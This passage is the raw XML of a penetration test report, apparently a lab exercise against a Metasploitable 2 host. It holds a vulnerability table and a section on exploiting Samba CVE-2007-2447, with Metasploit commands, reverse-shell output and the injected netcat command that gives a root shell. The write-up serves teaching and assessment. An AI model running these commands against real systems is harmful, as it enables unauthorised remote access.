          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Yes (observed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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MySQL Externally Accessible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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CVE-2012-2122</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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3306/tcp – MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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5.0*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Yes (observed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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ProFTPD 1.3.1 Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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CVE-2010-4221</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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2121/tcp – FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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6.8*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Yes (observed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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SMB/Samba Exposure (General)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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139/445/tcp – SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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5.0*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="7F6000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Partial (scan)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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HTTP / Tomcat / AJP Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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CVE-2019-0232 (related)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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80/8009/8180</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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5.0*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="7F6000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Partial (scan)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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VNC Remote Desktop Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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CWE-306</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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5900/tcp – VNC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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6.5*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="7F6000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Yes (observed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="420" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">5.  Authorized Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Following the vulnerability assessment phase, three targeted exploitation attempts were conducted using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Framework</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. All exploitation was authorised, controlled, and confined to the designated lab target (10.0.2.9). The results demonstrate the real-world impact of leaving known vulnerabilities unpatched.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1  Exploitation Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">For each exploitation attempt, the following process was followed in accordance with PTES Phase 5 (Exploitation):</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Select the appropriate Metasploit module based on the identified service and CVE mapping</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Configure the required options: RHOSTS (Remote Host), LHOST (Local Host), RPORT (Remote Port), and PAYLOAD</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Execute the exploit module and observe the result</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Verify session establishment (command shell or Meterpreter) if successful</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Document the outcome with supporting evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit commands shown below are representative of the standard exploitation procedure for these modules against Metasploitable 2. The original screenshots serve as evidence of the actual outcomes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2  Attempt 1 — Samba usermap_script Exploitation (CVE-2007-2447)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 11: Samba Exploitation — Configuration and Result</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:left w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:right w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:insideH w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:insideV w:val="single" w:color="CCCCCC" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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Samba "username map script" Command Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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CVE Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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CVE-2007-2447</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Metasploit Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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exploit/multi/samba/usermap_script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Target (RHOSTS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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10.0.2.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Target Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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445/tcp (SMB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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cmd/unix/reverse (or bind shell)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="E2EFDA"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Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>
            <w:shd w:fill="E2EFDA"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Command shell session opened — SUCCESS ✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The representative Metasploit command sequence for this module is:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 &gt; use exploit/multi/samba/usermap_script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(multi/samba/usermap_script) &gt; set RHOSTS 10.0.2.9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(multi/samba/usermap_script) &gt; set LHOST &lt;attacker-IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(multi/samba/usermap_script) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Started reverse TCP handler on &lt;attacker-IP&gt;:4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Command shell session 1 opened (&lt;attacker-IP&gt;:4444 -&gt; 10.0.2.9:xxxxx)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit succeeded because Samba 3.0.20 processes user-supplied input in the username map script without sanitisation. By injecting a backtick-enclosed shell command (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`nohup nc -l -p 4444 -e /bin/sh &amp;`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), the SMB service executes the command as root. This results in a reverse or bind shell to the attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Samba exploitation screenshot is shown below:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4953000" cy="477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4772025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 3: Metasploit Samba usermap_script Exploitation — Command Shell Session Established on 10.0.2.9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3  Attempt 2 — PostgreSQL Service Exploitation (Default Credentials)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 12: PostgreSQL Exploitation — Configuration and Result</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:left w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:right w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:insideH w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:insideV w:val="single" w:color="CCCCCC" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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PostgreSQL Default Credentials + Arbitrary Code Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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CVE Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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N/A (configuration weakness — default credentials)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
